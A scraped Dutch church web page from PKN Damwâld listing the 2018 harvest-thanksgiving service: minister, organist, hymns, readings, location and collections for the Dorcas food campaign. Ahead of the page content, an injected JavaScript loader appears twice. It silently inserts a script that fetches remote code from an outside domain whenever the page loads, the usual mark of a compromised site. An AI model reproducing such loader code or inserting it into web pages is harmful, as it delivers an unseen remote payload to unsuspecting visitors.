;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dankdag voor gewas en arbeid - PKN Damwâld
woensdag 7 november 2018
19:30 uur
Dankdag voor gewas en arbeid

Dankdag voor gewas en arbeid

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:Dankdag voor gewas en arbeid
Liturgie
lied voor de dienst : Elb 343 : 1, 2 en 4
Welkom
We zingen: Gez 44 : 1 en 2
Stil gebed, Votum en groet
We zingen: Gez.390:1,2 en 3
Geloofsbelijdenis
We zingen: Gez.330:1
Gebed
We lezen: Ef.5: 1 - 21
We zingen: Ps.65:5 en 6
Preek .
We zingen: Ps.103: 5 en 7
Dankzegging en voorbede
Collecte
Slotlied ELB 327a (2x)
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Dorcas voedselactie 2018

Dit jaar organiseert Dorcas voor de drieëntwintigste keer de Dorcas Voedselactie: een actieweek waarin duizenden mensen zich vrijwillig inzetten voor voedsel en voedselzekerheid voor de allerarmsten in Oost-Europa en Afrika. De Dorcas Voedselactie vindt plaats rondom de Dankdag voor gewas en arbeid. Dorcas ziet Dankdag als een uitgelezen moment om stil te staan bij onze niet vanzelfsprekende welvaart en om onze dankbaarheid te tonen door om te zien naar de allerarmsten in de wereld. Dit staat ook in missietekst van Dorcas, Mattheüs 25:31-46.

Tweede collecte: Kerk
Uitganscollecte: Dankstondcollecte